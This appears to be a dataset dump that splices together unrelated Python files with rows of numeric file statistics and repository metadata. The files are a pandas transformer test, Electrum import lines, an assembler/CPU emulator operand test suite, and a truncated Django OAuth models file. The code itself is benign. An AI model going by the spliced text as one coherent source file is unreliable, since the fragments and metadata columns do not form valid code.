df_transformed_correct=pd.DataFrame({'string2':['1','2','3','4'],'int':[1,2,3,4]})
df_transformed=FeatureConverter(columns_to_drop='string1').fit_transform(df)
for x, y in zip(df_transformed.columns, df_transformed_correct.columns):
self.assertAlmostEqual(x, y)
def test_drop_two(self):
"""
two columns should be dropped
"""
df=pd.DataFrame({'string1':['1','2','3','4'],'string2':['1','2','3','4'],'int':[1,2,3,4]})
df_transformed_correct=pd.DataFrame({'string2':['1','2','3','4']})
df_transformed=FeatureConverter(columns_to_drop=['string1','int']).fit_transform(df)
for x, y in zip(df_transformed.columns, df_transformed_correct.columns):
self.assertAlmostEqual(x, y)
if __name__ == '__main__':
unittest.main()
| 36.643902
| 150
| 0.578674
| 1,010
| 7,512
| 4.107921
| 0.070297
| 0.20053
| 0.154254
| 0.02603
| 0.875633
| 0.871294
| 0.849602
| 0.843095
| 0.82309
| 0.791516
| 0
| 0.040198
| 0.21845
| 7,512
| 205
| 151
| 36.643902
| 0.666496
| 0.076145
| 0
| 0.464646
| 0
| 0
| 0.090021
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.141414
| false
| 0
| 0.040404
| 0
| 0.191919
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
214dadec662fb38acdc0deacef6867d63bff248c
| 153
|
py
|
Python
|
electrum_gui/common/provider/chains/bch/__init__.py
|
BixinKey/electrum
|
f5de4e74e313b9b569f13ba6ab9142a38bf095f2
|
[
"MIT"
] | 12
|
2020-11-12T08:53:05.000Z
|
2021-07-06T17:30:39.000Z
|
electrum_gui/common/provider/chains/bch/__init__.py
|
BixinKey/electrum
|
f5de4e74e313b9b569f13ba6ab9142a38bf095f2
|
[
"MIT"
] | 209
|
2020-09-23T06:58:18.000Z
|
2021-11-18T11:25:41.000Z
|
electrum_gui/common/provider/chains/bch/__init__.py
|
taimanhui/electrum
|
f5de4e74e313b9b569f13ba6ab9142a38bf095f2
|
[
"MIT"
] | 19
|
2020-10-13T11:42:26.000Z
|
2022-02-06T01:26:34.000Z
|
from electrum_gui.common.provider.chains.bch.provider import BCHProvider
from electrum_gui.common.provider.chains.btc.clients.blockbook import BlockBook
| 51
| 79
| 0.875817
| 21
| 153
| 6.285714
| 0.571429
| 0.181818
| 0.227273
| 0.318182
| 0.530303
| 0.530303
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052288
| 153
| 2
| 80
| 76.5
| 0.910345
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
216485c38366b8711003ea1f47b4b3d0d3777fa3
| 25,526
|
py
|
Python
|
tests/test_operands.py
|
cu2/aldebaran
|
affd692bd568cdb5a3a1840c6bc02b5197da1064
|
[
"MIT"
] | 4
|
2018-11-20T07:31:48.000Z
|
2020-12-29T22:04:03.000Z
|
tests/test_operands.py
|
cu2/aldebaran
|
affd692bd568cdb5a3a1840c6bc02b5197da1064
|
[
"MIT"
] | 7
|
2020-09-04T22:49:12.000Z
|
2022-02-26T11:19:39.000Z
|
tests/test_operands.py
|
cu2/aldebaran
|
affd692bd568cdb5a3a1840c6bc02b5197da1064
|
[
"MIT"
] | null | null | null |
import unittest
from unittest.mock import Mock
from instructions.operands import (
Operand, OpLen, OpType,
get_operand_opcode, parse_operand_buffer,
get_operand_value, set_operand_value,
_get_reference_address, _get_opbyte,
_get_register_code_by_name, _get_register_name_by_code,
InvalidRegisterNameError, InvalidRegisterCodeError,
InvalidTokenError,
InvalidOperandError, InvalidWriteOperationError, InsufficientOperandBufferError,
)
from assembler.tokenizer import Token, Reference, TokenType
from utils.utils import WordOutOfRangeError, ByteOutOfRangeError
class TestGetOperandOpcode(unittest.TestCase):
def test_literal(self):
self.assertListEqual(get_operand_opcode(Token(TokenType.WORD_LITERAL, 65535, 0)), [
_get_opbyte(OpLen.WORD, OpType.VALUE),
0xFF, 0xFF,
])
with self.assertRaises(WordOutOfRangeError):
get_operand_opcode(Token(TokenType.WORD_LITERAL, 65536, 0))
self.assertListEqual(get_operand_opcode(Token(TokenType.BYTE_LITERAL, 255, 0)), [
_get_opbyte(OpLen.BYTE, OpType.VALUE),
0xFF,
])
with self.assertRaises(ByteOutOfRangeError):
get_operand_opcode(Token(TokenType.BYTE_LITERAL, -1, 0))
self.assertListEqual(get_operand_opcode(Token(TokenType.ADDRESS_WORD_LITERAL, -1, 0)), [
_get_opbyte(OpLen.WORD, OpType.ADDRESS),
0xFF, 0xFF,
])
with self.assertRaises(WordOutOfRangeError):
get_operand_opcode(Token(TokenType.ADDRESS_WORD_LITERAL, 35000, 0))
def test_register(self):
self.assertListEqual(get_operand_opcode(Token(TokenType.WORD_REGISTER, 'AX', 0)), [
_get_opbyte(OpLen.WORD, OpType.REGISTER, 'AX'),
])
self.assertListEqual(get_operand_opcode(Token(TokenType.BYTE_REGISTER, 'AL', 0)), [
_get_opbyte(OpLen.BYTE, OpType.REGISTER, 'AL'),
])
self.assertListEqual(get_operand_opcode(Token(TokenType.BYTE_REGISTER, 'AH', 0)), [
_get_opbyte(OpLen.BYTE, OpType.REGISTER, 'AH'),
])
with self.assertRaises(InvalidRegisterNameError):
get_operand_opcode(Token(TokenType.WORD_REGISTER, 'XX', 0))
def test_abs_ref(self):
self.assertListEqual(get_operand_opcode(Token(TokenType.ABS_REF_REG, Reference('BX', 0, 'B'), 0)), [
_get_opbyte(OpLen.BYTE, OpType.ABS_REF_REG, 'BX'),
0x00,
])
self.assertListEqual(get_operand_opcode(Token(TokenType.ABS_REF_REG, Reference('BX', 1, 'B'), 0)), [
_get_opbyte(OpLen.BYTE, OpType.ABS_REF_REG, 'BX'),
0x01,
])
self.assertListEqual(get_operand_opcode(Token(TokenType.ABS_REF_REG, Reference('BX', -1, 'W'), 0)), [
_get_opbyte(OpLen.WORD, OpType.ABS_REF_REG, 'BX'),
0xFF,
])
with self.assertRaises(InvalidRegisterNameError):
get_operand_opcode(Token(TokenType.ABS_REF_REG, Reference('XX', 0, 'W'), 0))
with self.assertRaises(ByteOutOfRangeError):
get_operand_opcode(Token(TokenType.ABS_REF_REG, Reference('BX', 150, 'W'), 0))
def test_rel_ref(self):
self.assertListEqual(get_operand_opcode(Token(TokenType.REL_REF_WORD, Reference(-1, 0, 'B'), 0)), [
_get_opbyte(OpLen.BYTE, OpType.REL_REF_WORD),
0xFF, 0xFF,
])
with self.assertRaises(WordOutOfRangeError):
get_operand_opcode(Token(TokenType.REL_REF_WORD, Reference(35000, 0, 'B'), 0))
with self.assertRaises(WordOutOfRangeError):
get_operand_opcode(Token(TokenType.REL_REF_WORD, Reference(-35000, 0, 'B'), 0))
self.assertListEqual(get_operand_opcode(Token(TokenType.REL_REF_WORD_BYTE, Reference(-1, 255, 'B'), 0)), [
_get_opbyte(OpLen.BYTE, OpType.REL_REF_WORD_BYTE),
0xFF, 0xFF, 0xFF,
])
self.assertListEqual(get_operand_opcode(Token(TokenType.REL_REF_WORD_REG, Reference(-1, 'BX', 'B'), 0)), [
_get_opbyte(OpLen.BYTE, OpType.REL_REF_WORD_REG, 'BX'),
0xFF, 0xFF,
])
with self.assertRaises(InvalidRegisterNameError):
get_operand_opcode(Token(TokenType.REL_REF_WORD_REG, Reference(12000, 'XX', 'B'), 0))
def test_other(self):
with self.assertRaises(InvalidTokenError):
get_operand_opcode(Token(TokenType.STRING_LITERAL, 0, 0))
with self.assertRaises(InvalidTokenError):
get_operand_opcode(Token('unknown', 0, 0))
class TestParseOperandBuffer(unittest.TestCase):
def test_value(self):
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.VALUE),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.VALUE)
self.assertIsNone(operands[0].opreg)
self.assertEqual(operands[0].opvalue, 65535)
self.assertIsNone(operands[0].opbase)
self.assertIsNone(operands[0].opoffset)
self.assertListEqual(operand_buffer_indices, [3])
self.assertEqual(opcode_length, 4)
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.BYTE, OpType.VALUE),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.BYTE)
self.assertEqual(operands[0].optype, OpType.VALUE)
self.assertIsNone(operands[0].opreg)
self.assertEqual(operands[0].opvalue, 255)
self.assertIsNone(operands[0].opbase)
self.assertIsNone(operands[0].opoffset)
self.assertListEqual(operand_buffer_indices, [2])
self.assertEqual(opcode_length, 3)
def test_address(self):
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.ADDRESS),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.ADDRESS)
self.assertIsNone(operands[0].opreg)
self.assertEqual(operands[0].opvalue, -1)
self.assertIsNone(operands[0].opbase)
self.assertIsNone(operands[0].opoffset)
self.assertListEqual(operand_buffer_indices, [3])
self.assertEqual(opcode_length, 4)
with self.assertRaises(InvalidOperandError):
parse_operand_buffer([
_get_opbyte(OpLen.BYTE, OpType.ADDRESS),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
def test_register(self):
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.REGISTER, 'BX'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.REGISTER)
self.assertEqual(operands[0].opreg, 'BX')
self.assertIsNone(operands[0].opvalue)
self.assertIsNone(operands[0].opbase)
self.assertIsNone(operands[0].opoffset)
self.assertListEqual(operand_buffer_indices, [1])
self.assertEqual(opcode_length, 2)
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.BYTE, OpType.REGISTER, 'AH'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.BYTE)
self.assertEqual(operands[0].optype, OpType.REGISTER)
self.assertEqual(operands[0].opreg, 'AH')
self.assertIsNone(operands[0].opvalue)
self.assertIsNone(operands[0].opbase)
self.assertIsNone(operands[0].opoffset)
self.assertListEqual(operand_buffer_indices, [1])
self.assertEqual(opcode_length, 2)
with self.assertRaises(InvalidRegisterCodeError):
parse_operand_buffer([
_get_opbyte(OpLen.BYTE, OpType.REGISTER, 'BX'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
with self.assertRaises(InvalidRegisterNameError):
parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.REGISTER, 'XX'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
def test_abs_ref(self):
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.ABS_REF_REG, 'BX'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.ABS_REF_REG)
self.assertEqual(operands[0].opreg, 'BX')
self.assertIsNone(operands[0].opvalue)
self.assertIsNone(operands[0].opbase)
self.assertEqual(operands[0].opoffset, -1)
self.assertListEqual(operand_buffer_indices, [2])
self.assertEqual(opcode_length, 3)
with self.assertRaises(InvalidRegisterCodeError):
parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.ABS_REF_REG, 'AH'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
def test_rel_ref(self):
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.REL_REF_WORD),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.REL_REF_WORD)
self.assertIsNone(operands[0].opreg)
self.assertIsNone(operands[0].opvalue)
self.assertEqual(operands[0].opbase, -1)
self.assertIsNone(operands[0].opoffset)
self.assertListEqual(operand_buffer_indices, [3])
self.assertEqual(opcode_length, 4)
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.REL_REF_WORD_BYTE),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.REL_REF_WORD_BYTE)
self.assertIsNone(operands[0].opreg)
self.assertIsNone(operands[0].opvalue)
self.assertEqual(operands[0].opbase, -1)
self.assertEqual(operands[0].opoffset, 255)
self.assertListEqual(operand_buffer_indices, [4])
self.assertEqual(opcode_length, 5)
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.REL_REF_WORD_REG, 'BX'),
0xFF, 0xFF, 0xFF, 0xFF,
], 1)
self.assertEqual(len(operands), 1)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.REL_REF_WORD_REG)
self.assertEqual(operands[0].opreg, 'BX')
self.assertIsNone(operands[0].opvalue)
self.assertEqual(operands[0].opbase, -1)
self.assertIsNone(operands[0].opoffset)
self.assertListEqual(operand_buffer_indices, [3])
self.assertEqual(opcode_length, 4)
def test_multiple_operands(self):
operands, operand_buffer_indices, opcode_length = parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.REGISTER, 'BX'),
_get_opbyte(OpLen.WORD, OpType.VALUE),
0xFF, 0xFF, 0xFF, 0xFF,
], 2)
self.assertEqual(len(operands), 2)
self.assertEqual(operands[0].oplen, OpLen.WORD)
self.assertEqual(operands[0].optype, OpType.REGISTER)
self.assertEqual(operands[0].opreg, 'BX')
self.assertIsNone(operands[0].opvalue)
self.assertIsNone(operands[0].opbase)
self.assertIsNone(operands[0].opoffset)
self.assertEqual(operands[1].oplen, OpLen.WORD)
self.assertEqual(operands[1].optype, OpType.VALUE)
self.assertIsNone(operands[1].opreg)
self.assertEqual(operands[1].opvalue, 65535)
self.assertIsNone(operands[1].opbase)
self.assertIsNone(operands[1].opoffset)
self.assertListEqual(operand_buffer_indices, [1, 4])
self.assertEqual(opcode_length, 5)
def test_not_enough_buffer(self):
with self.assertRaises(InsufficientOperandBufferError):
parse_operand_buffer([
_get_opbyte(OpLen.WORD, OpType.VALUE),
0xFF,
], 1)
class TestGetOperandValue(unittest.TestCase):
def setUp(self):
self.cpu = Mock()
self.ram = Mock()
self.cpu.registers.get_register.return_value = 0xA0B0
self.ram.read_byte = Mock()
self.ram.read_byte.return_value = 0xCC
self.ram.read_word = Mock()
self.ram.read_word.return_value = 0xCCDD
def test_value(self):
self.assertEqual(get_operand_value(
Operand(OpLen.BYTE, OpType.VALUE, None, 255, None, None),
self.cpu, self.ram, 0x1234,
), 255)
self.assertEqual(get_operand_value(
Operand(OpLen.WORD, OpType.VALUE, None, 65535, None, None),
self.cpu, self.ram, 0x1234,
), 65535)
self.assertEqual(self.cpu.registers.get_register.call_count, 0)
self.assertEqual(self.ram.read_byte.call_count, 0)
self.assertEqual(self.ram.read_word.call_count, 0)
def test_address(self):
self.assertEqual(get_operand_value(
Operand(OpLen.WORD, OpType.ADDRESS, None, 1, None, None),
self.cpu, self.ram, 0x1234,
), 0x1235)
self.assertEqual(get_operand_value(
Operand(OpLen.WORD, OpType.ADDRESS, None, -1, None, None),
self.cpu, self.ram, 0x1234,
), 0x1233)
self.assertEqual(self.cpu.registers.get_register.call_count, 0)
self.assertEqual(self.ram.read_byte.call_count, 0)
self.assertEqual(self.ram.read_word.call_count, 0)
def test_register(self):
self.assertEqual(get_operand_value(
Operand(OpLen.WORD, OpType.REGISTER, 'AX', 1, None, None),
self.cpu, self.ram, 0x1234,
), 0xA0B0)
self.assertEqual(self.cpu.registers.get_register.call_count, 1)
self.assertEqual(self.cpu.registers.get_register.call_args_list[0][0][0], 'AX')
self.assertEqual(self.ram.read_byte.call_count, 0)
self.assertEqual(self.ram.read_word.call_count, 0)
def test_abs_ref_reg_b(self):
self.assertEqual(get_operand_value(
Operand(OpLen.BYTE, OpType.ABS_REF_REG, 'AX', None, None, 0x01),
self.cpu, self.ram, 0x1234,
), 0xCC)
self.assertEqual(self.cpu.registers.get_register.call_count, 1)
self.assertEqual(self.cpu.registers.get_register.call_args_list[0][0][0], 'AX')
self.assertEqual(self.ram.read_byte.call_count, 1)
self.assertEqual(self.ram.read_byte.call_args_list[0][0][0], 0xA0B1)
self.assertEqual(self.ram.read_word.call_count, 0)
def test_abs_ref_reg_w(self):
self.assertEqual(get_operand_value(
Operand(OpLen.WORD, OpType.ABS_REF_REG, 'AX', None, None, 0x01),
self.cpu, self.ram, 0x1234,
), 0xCCDD)
self.assertEqual(self.cpu.registers.get_register.call_count, 1)
self.assertEqual(self.cpu.registers.get_register.call_args_list[0][0][0], 'AX')
self.assertEqual(self.ram.read_byte.call_count, 0)
self.assertEqual(self.ram.read_word.call_count, 1)
self.assertEqual(self.ram.read_word.call_args_list[0][0][0], 0xA0B1)
def test_rel_ref_word(self):
self.assertEqual(get_operand_value(
Operand(OpLen.BYTE, OpType.REL_REF_WORD, None, None, -0x1111, None),
self.cpu, self.ram, 0x1234,
), 0xCC)
self.assertEqual(self.cpu.registers.get_register.call_count, 0)
self.assertEqual(self.ram.read_byte.call_count, 1)
self.assertEqual(self.ram.read_byte.call_args_list[0][0][0], 0x0123)
self.assertEqual(self.ram.read_word.call_count, 0)
def test_rel_ref_word_byte(self):
self.assertEqual(get_operand_value(
Operand(OpLen.BYTE, OpType.REL_REF_WORD_BYTE, None, None, -0x1111, 0x22),
self.cpu, self.ram, 0x1234,
), 0xCC)
self.assertEqual(self.cpu.registers.get_register.call_count, 0)
self.assertEqual(self.ram.read_byte.call_count, 1)
self.assertEqual(self.ram.read_byte.call_args_list[0][0][0], 0x0145)
self.assertEqual(self.ram.read_word.call_count, 0)
def test_rel_ref_word_reg(self):
self.assertEqual(get_operand_value(
Operand(OpLen.BYTE, OpType.REL_REF_WORD_REG, 'AX', None, -0x1111, None),
self.cpu, self.ram, 0x1234,
), 0xCC)
self.assertEqual(self.cpu.registers.get_register.call_count, 1)
self.assertEqual(self.cpu.registers.get_register.call_args_list[0][0][0], 'AX')
self.assertEqual(self.ram.read_byte.call_count, 1)
self.assertEqual(self.ram.read_byte.call_args_list[0][0][0], 0xA1D3)
self.assertEqual(self.ram.read_word.call_count, 0)
class TestSetOperandValue(unittest.TestCase):
def setUp(self):
self.cpu = Mock()
self.ram = Mock()
self.cpu.registers.get_register.return_value = 0xA0B0
self.cpu.registers.set_register = Mock()
self.ram.write_byte = Mock()
self.ram.write_word = Mock()
def test_readonly(self):
with self.assertRaises(InvalidWriteOperationError):
set_operand_value(
Operand(OpLen.BYTE, OpType.VALUE, None, 255, None, None),
0x44,
self.cpu, self.ram, 0x1234,
)
with self.assertRaises(InvalidWriteOperationError):
set_operand_value(
Operand(OpLen.WORD, OpType.ADDRESS, None, -1, None, None),
0x3344,
self.cpu, self.ram, 0x1234,
)
def test_register(self):
set_operand_value(
Operand(OpLen.WORD, OpType.REGISTER, 'AX', 1, None, None),
0x3344,
self.cpu, self.ram, 0x1234,
)
self.assertEqual(self.cpu.registers.get_register.call_count, 0)
self.assertEqual(self.cpu.registers.set_register.call_count, 1)
self.assertEqual(self.cpu.registers.set_register.call_args_list[0][0][0], 'AX')
self.assertEqual(self.cpu.registers.set_register.call_args_list[0][0][1], 0x3344)
self.assertEqual(self.ram.write_byte.call_count, 0)
self.assertEqual(self.ram.write_word.call_count, 0)
def test_abs_ref_reg_b(self):
set_operand_value(
Operand(OpLen.BYTE, OpType.ABS_REF_REG, 'AX', None, None, 0x01),
0x33,
self.cpu, self.ram, 0x1234,
)
self.assertEqual(self.cpu.registers.get_register.call_count, 1)
self.assertEqual(self.cpu.registers.get_register.call_args_list[0][0][0], 'AX')
self.assertEqual(self.ram.write_byte.call_count, 1)
self.assertEqual(self.ram.write_byte.call_args_list[0][0][0], 0xA0B1)
self.assertEqual(self.ram.write_byte.call_args_list[0][0][1], 0x33)
self.assertEqual(self.ram.write_word.call_count, 0)
def test_abs_ref_reg_w(self):
set_operand_value(
Operand(OpLen.WORD, OpType.ABS_REF_REG, 'AX', None, None, 0x01),
0x3344,
self.cpu, self.ram, 0x1234,
)
self.assertEqual(self.cpu.registers.get_register.call_count, 1)
self.assertEqual(self.cpu.registers.get_register.call_args_list[0][0][0], 'AX')
self.assertEqual(self.ram.write_byte.call_count, 0)
self.assertEqual(self.ram.write_word.call_count, 1)
self.assertEqual(self.ram.write_word.call_args_list[0][0][0], 0xA0B1)
self.assertEqual(self.ram.write_word.call_args_list[0][0][1], 0x3344)
def test_rel_ref_word(self):
set_operand_value(
Operand(OpLen.BYTE, OpType.REL_REF_WORD, None, None, -0x1111, None),
0x33,
self.cpu, self.ram, 0x1234,
)
self.assertEqual(self.cpu.registers.get_register.call_count, 0)
self.assertEqual(self.ram.write_byte.call_count, 1)
self.assertEqual(self.ram.write_byte.call_args_list[0][0][0], 0x0123)
self.assertEqual(self.ram.write_byte.call_args_list[0][0][1], 0x33)
self.assertEqual(self.ram.write_word.call_count, 0)
def test_rel_ref_word_byte(self):
set_operand_value(
Operand(OpLen.BYTE, OpType.REL_REF_WORD_BYTE, None, None, -0x1111, 0x22),
0x33,
self.cpu, self.ram, 0x1234,
)
self.assertEqual(self.cpu.registers.get_register.call_count, 0)
self.assertEqual(self.ram.write_byte.call_count, 1)
self.assertEqual(self.ram.write_byte.call_args_list[0][0][0], 0x0145)
self.assertEqual(self.ram.write_byte.call_args_list[0][0][1], 0x33)
self.assertEqual(self.ram.write_word.call_count, 0)
def test_rel_ref_word_reg(self):
set_operand_value(
Operand(OpLen.BYTE, OpType.REL_REF_WORD_REG, 'AX', None, -0x1111, None),
0x33,
self.cpu, self.ram, 0x1234,
)
self.assertEqual(self.cpu.registers.get_register.call_count, 1)
self.assertEqual(self.cpu.registers.get_register.call_args_list[0][0][0], 'AX')
self.assertEqual(self.ram.write_byte.call_count, 1)
self.assertEqual(self.ram.write_byte.call_args_list[0][0][0], 0xA1D3)
self.assertEqual(self.ram.write_byte.call_args_list[0][0][1], 0x33)
self.assertEqual(self.ram.write_word.call_count, 0)
class TestGetReferenceAddress(unittest.TestCase):
def setUp(self):
self.cpu = Mock()
def test_abs_ref_reg(self):
self.cpu.registers.get_register.return_value = 0xA0B0
self.assertEqual(_get_reference_address(
Operand(OpLen.BYTE, OpType.ABS_REF_REG, 'AX', None, None, 0x01),
self.cpu,
0x1234,
), 0xA0B1)
self.assertEqual(_get_reference_address(
Operand(OpLen.BYTE, OpType.ABS_REF_REG, 'AX', None, None, -0x01),
self.cpu,
0x1234,
), 0xA0AF)
def test_rel_ref_word(self):
self.assertEqual(_get_reference_address(
Operand(OpLen.BYTE, OpType.REL_REF_WORD, None, None, 0x1111, None),
self.cpu,
0x1234,
), 0x2345)
self.assertEqual(_get_reference_address(
Operand(OpLen.BYTE, OpType.REL_REF_WORD, None, None, -0x1111, None),
self.cpu,
0x1234,
), 0x0123)
def test_rel_ref_word_byte(self):
self.assertEqual(_get_reference_address(
Operand(OpLen.BYTE, OpType.REL_REF_WORD_BYTE, None, None, 0x1111, 0x22),
self.cpu,
0x1234,
), 0x2367)
self.assertEqual(_get_reference_address(
Operand(OpLen.BYTE, OpType.REL_REF_WORD_BYTE, None, None, -0x1111, 0x22),
self.cpu,
0x1234,
), 0x0145)
def test_rel_ref_word_reg(self):
self.cpu.registers.get_register.return_value = 0xA0B0
self.assertEqual(_get_reference_address(
Operand(OpLen.BYTE, OpType.REL_REF_WORD_REG, 'AX', None, 0x1111, None),
self.cpu,
0x1234,
), 0xC3F5)
self.assertEqual(_get_reference_address(
Operand(OpLen.BYTE, OpType.REL_REF_WORD_REG, 'AX', None, -0x1111, None),
self.cpu,
0x1234,
), 0xA1D3)
class TestGetOpbyte(unittest.TestCase):
def test(self):
self.assertEqual(_get_opbyte(OpLen.BYTE, OpType.VALUE), 0x00)
self.assertEqual(_get_opbyte(OpLen.WORD, OpType.VALUE), 0x80)
self.assertEqual(_get_opbyte(OpLen.BYTE, OpType.VALUE, 'AX'), 0x00)
self.assertEqual(_get_opbyte(OpLen.WORD, OpType.VALUE, 'AX'), 0x80)
self.assertEqual(_get_opbyte(OpLen.BYTE, OpType.VALUE, 'BX'), 0x01)
self.assertEqual(_get_opbyte(OpLen.WORD, OpType.VALUE, 'BX'), 0x81)
self.assertEqual(_get_opbyte(OpLen.BYTE, OpType.EXTENDED), 0x70)
self.assertEqual(_get_opbyte(OpLen.WORD, OpType.EXTENDED), 0xF0)
self.assertEqual(_get_opbyte(OpLen.BYTE, OpType.EXTENDED, 'AX'), 0x70)
self.assertEqual(_get_opbyte(OpLen.WORD, OpType.EXTENDED, 'AX'), 0xF0)
self.assertEqual(_get_opbyte(OpLen.BYTE, OpType.EXTENDED, 'BX'), 0x71)
self.assertEqual(_get_opbyte(OpLen.WORD, OpType.EXTENDED, 'BX'), 0xF1)
class TestRegisters(unittest.TestCase):
def test_get_register_code_by_name(self):
self.assertEqual(_get_register_code_by_name('AX'), 0)
self.assertEqual(_get_register_code_by_name('AL'), 8)
self.assertEqual(_get_register_code_by_name('AH'), 9)
with self.assertRaises(InvalidRegisterNameError):
_get_register_code_by_name('XX')
def test_get_register_name_by_code(self):
self.assertEqual(_get_register_name_by_code(0), 'AX')
self.assertEqual(_get_register_name_by_code(8), 'AL')
self.assertEqual(_get_register_name_by_code(9), 'AH')
with self.assertRaises(InvalidRegisterCodeError):
_get_register_name_by_code(-1)
with self.assertRaises(InvalidRegisterCodeError):
_get_register_name_by_code(16)
| 44.315972
| 114
| 0.653882
| 3,137
| 25,526
| 5.090214
| 0.043354
| 0.149361
| 0.079722
| 0.059243
| 0.905937
| 0.880699
| 0.867172
| 0.831851
| 0.784632
| 0.702781
| 0
| 0.042487
| 0.226397
| 25,526
| 575
| 115
| 44.393043
| 0.766142
| 0
| 0
| 0.682171
| 0
| 0
| 0.005876
| 0
| 0
| 0
| 0.033378
| 0
| 0.449612
| 1
| 0.071705
| false
| 0
| 0.00969
| 0
| 0.094961
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
dccfcf5fe340584cacae04463285d5b6a560f3d3
| 4,369
|
py
|
Python
|
readthedocs/oauth/models.py
|
adrianmugnoz/Documentacion-universidades
|
0e088718cdfdb2c9c52118c181def8086c821b1e
|
[
"MIT"
] | 1
|
2019-05-07T15:08:53.000Z
|
2019-05-07T15:08:53.000Z
|
readthedocs/oauth/models.py
|
mba811/readthedocs.org
|
b882cec8c0e7d741d3c58af2f6d0f48d1a123f8d
|
[
"MIT"
] | null | null | null |
readthedocs/oauth/models.py
|
mba811/readthedocs.org
|
b882cec8c0e7d741d3c58af2f6d0f48d1a123f8d
|
[
"MIT"
] | null | null | null |
from django.db import models
from django.contrib.auth.models import User
from django.utils.translation import ugettext_lazy as _
class GithubOrganization(models.Model):
# Auto fields
pub_date = models.DateTimeField(_('Publication date'), auto_now_add=True)
modified_date = models.DateTimeField(_('Modified date'), auto_now=True)
users = models.ManyToManyField(User, verbose_name=_('Users'),
related_name='github_organizations')
login = models.CharField(_('Login'), max_length=255, unique=True)
email = models.EmailField(_('Email'), max_length=255, null=True, blank=True)
name = models.CharField(_('Name'), max_length=255, null=True, blank=True)
html_url = models.URLField(_('HTML URL'), max_length=200, null=True, blank=True)
active = models.BooleanField(_('Active'), default=False)
json = models.TextField('JSON')
def __unicode__(self):
return "GitHub Organization: %s" % (self.html_url)
class GithubProject(models.Model):
# Auto fields
pub_date = models.DateTimeField(_('Publication date'), auto_now_add=True)
modified_date = models.DateTimeField(_('Modified date'), auto_now=True)
users = models.ManyToManyField(User, verbose_name=_('Users'),
related_name='github_projects')
organization = models.ForeignKey(GithubOrganization, verbose_name=_('Organization'),
related_name='projects', null=True, blank=True)
name = models.CharField(_('Name'), max_length=255)
full_name = models.CharField(_('Full Name'), max_length=255, unique=True)
description = models.TextField(_('Description'), blank=True, null=True,
help_text=_('The reStructuredText description of the project'))
git_url = models.CharField(_('Git URL'), max_length=200, blank=True)
ssh_url = models.CharField(_('SSH URL'), max_length=200, blank=True)
html_url = models.URLField(_('HTML URL'), max_length=200, null=True, blank=True)
active = models.BooleanField(_('Active'), default=False)
json = models.TextField('JSON')
def __unicode__(self):
return "GitHub Project: %s" % (self.html_url)
class BitbucketTeam(models.Model):
# Auto fields
pub_date = models.DateTimeField(_('Publication date'), auto_now_add=True)
